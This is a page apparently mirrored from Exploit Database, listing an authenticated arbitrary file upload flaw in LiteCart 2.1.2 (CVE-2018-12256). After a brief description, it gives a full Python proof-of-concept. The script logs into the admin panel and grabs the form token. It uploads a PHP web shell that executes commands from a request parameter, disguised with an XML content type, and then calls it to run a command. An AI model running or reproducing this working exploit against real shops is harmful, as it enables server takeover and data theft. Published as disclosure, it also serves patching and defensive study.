LiteCart 2.1.2 – Arbitrary File Upload

• Exploit Database
• 14 阅读

• 作者： Haboob Team
  日期： 2018-08-27
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/45267/

• # Exploit Title: LiteCart 2.1.2 - Arbitrary File Upload
  # Date: 2018-08-27
  # Exploit Author: Haboob Team
  # Software Link: https://www.litecart.net/downloading?version=2.1.2
  # Version: 2.1.2
  # CVE : CVE-2018-12256
  
  # 1. Description
  # admin/vqmods.app/vqmods.inc.php in LiteCart 2.1.2 allows remote authenticated attackers 
  # to upload a malicious file (resulting in remote code execution) by using the text/xml 
  # or application/xml Content-Type in a public_html/admin/?app=vqmods&doc=vqmods request.
   
  # 2. Proof of Concept
   
  #!/usr/bin/env python
  import mechanize
  import cookielib
  import urllib2
  import requests
  import sys
  import argparse
  import random
  import string
  parser = argparse.ArgumentParser(description='LiteCart')
  parser.add_argument('-t',
  help='admin login page url - EX: https://IPADDRESS/admin/')
  parser.add_argument('-p',
  help='admin password')
  parser.add_argument('-u',
  help='admin username')
  args = parser.parse_args()
  if(not args.u or not args.t or not args.p):
  sys.exit("-h for help")
  url = args.t
  user = args.u
  password = args.p
  
  br = mechanize.Browser()
  cookiejar = cookielib.LWPCookieJar()
  br.set_cookiejar( cookiejar )
  br.set_handle_equiv( True )
  br.set_handle_redirect( True )
  br.set_handle_referer( True )
  br.set_handle_robots( False )
  br.addheaders = [ ( 'User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1' ) ]
  response = br.open(url)
  br.select_form(name="login_form")
  br["username"] = user
  br["password"] = password
  res = br.submit()
  response = br.open(url + "?app=vqmods&doc=vqmods")
  one=""
  for form in br.forms():
  one= str(form).split("(")
  one= one[1].split("=")
  one= one[1].split(")")
  one = one[0]
  cookies = br._ua_handlers['_cookies'].cookiejar
  cookie_dict = {}
  for c in cookies:
  cookie_dict[c.name] = c.value
  rand = ''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(5))
  files = {
  'vqmod': (rand + ".php", "<?php if( isset( $_REQUEST['c'] ) ) { system( $_REQUEST['c'] . ' 2>&1' ); } ?>", "application/xml"),
  'token':one,
  'upload':(None,"Upload")
  }
  response = requests.post(url + "?app=vqmods&doc=vqmods", files=files, cookies=cookie_dict)
  r = requests.get(url + "../vqmod/xml/" + rand + ".php?c=id")
  if r.status_code == 200:
  print "Shell => " + url + "../vqmod/xml/" + rand + ".php?c=id"
  print r.content
  else:
  print "Sorry something went wrong"